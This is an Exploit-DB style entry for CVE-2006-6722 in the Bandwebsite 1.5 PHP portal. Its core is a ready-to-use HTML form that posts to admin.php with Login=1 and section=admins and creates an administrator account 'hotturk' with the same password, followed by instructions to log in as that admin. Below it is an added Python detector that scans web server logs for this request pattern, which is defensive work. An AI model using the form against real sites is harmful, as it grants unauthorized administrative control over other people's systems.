Bandwebsite <= 1.5 Login Remote Add Admin Exploit

2006-12-16T00:00:00
ID EDB-ID:2938
Type exploitdb
Reporter H0tTurk-
Modified 2006-12-16T00:00:00

Description

Bandwebsite <= 1.5 (Login) Remote Add Admin Exploit. CVE-2006-6722. Web application exploit for the PHP platform.

<!--
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php
- Author  : H0tTurk-

Website version: 1.x
- Problem : Admin Added Access.

Bandsite is an online portal system designed for bands. Features: themes support, news posting, audio sections, guestbook, tour guide, an admin section to manage overall data and configurations, and more.
-->

<TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
  <TBODY>
  <tr><td bgcolor=#ffffff>
&nbsp;</p>
<p>
<form action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins method=post>
   Name:<br>
<input type=text name='name' value='hotturk' size="20"><br>
   Pass:<br>
<input type=text name='pass' value='hotturk' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>

<!--
Admin Added :)
http://[target]/bandwebsite/login.php
and login as admin
name : hotturk
pass : hotturk

--------------------------------------------------------
Special Thx: Dr.Max.Virus,GencTurk,Str0ke,SawTurk,Chironex Fleckeri,Unique-key,KurtEfendy,MadConfig,R4zor,Arabian-FighterZ,And Ayyildiz ViP Soldiers
                                       "BEYOND THIS, EITHER INDEPENDENCE OR DEATH"
-->

# milw0rm.com [2006-12-16]
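The form above posts to admin.php with Login=1 and section=admins in the query string, which is the request shape a defender would look for in web server logs. The following detector is an added example, not part of the original advisory or the Bandwebsite project; the log lines are constructed in Apache combined format, and the IP addresses and timestamps are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def is_admin_add_request(path):
    """True when the request path matches the advisory's admin-creation
    pattern: admin.php called with Login=1 and section=admins in the query.
    Any HTTP method is flagged so a GET variant of the same request is not missed."""
    parts = urlsplit(path)
    if not parts.path.endswith("/admin.php"):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    return qs.get("Login") == ["1"] and qs.get("section") == ["admins"]

def scan_log(lines):
    """Return (ip, timestamp, method, path) for every log line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_admin_add_request(m["path"]):
            hits.append((m["ip"], m["ts"], m["method"], m["path"]))
    return hits

# Constructed sample log lines (not real traffic): a page view, a normal login
# through login.php, and one request shaped like the advisory's form submit.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Dec/2006:10:01:02 +0000] "GET /bandwebsite/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Dec/2006:10:01:30 +0000] "POST /bandwebsite/login.php HTTP/1.1" 302 0',
    '198.51.100.9 - - [16/Dec/2006:10:02:11 +0000] "POST /bandwebsite/admin.php?&Login=1&section=admins HTTP/1.1" 200 834',
]

if __name__ == "__main__":
    for ip, ts, method, path in scan_log(SAMPLE_LOG):
        print(f"ALERT {ts} {ip} {method} {path}")
```

A hit on this pattern from a client that never completed a login through login.php is the signal to verify the admin table for unexpected accounts.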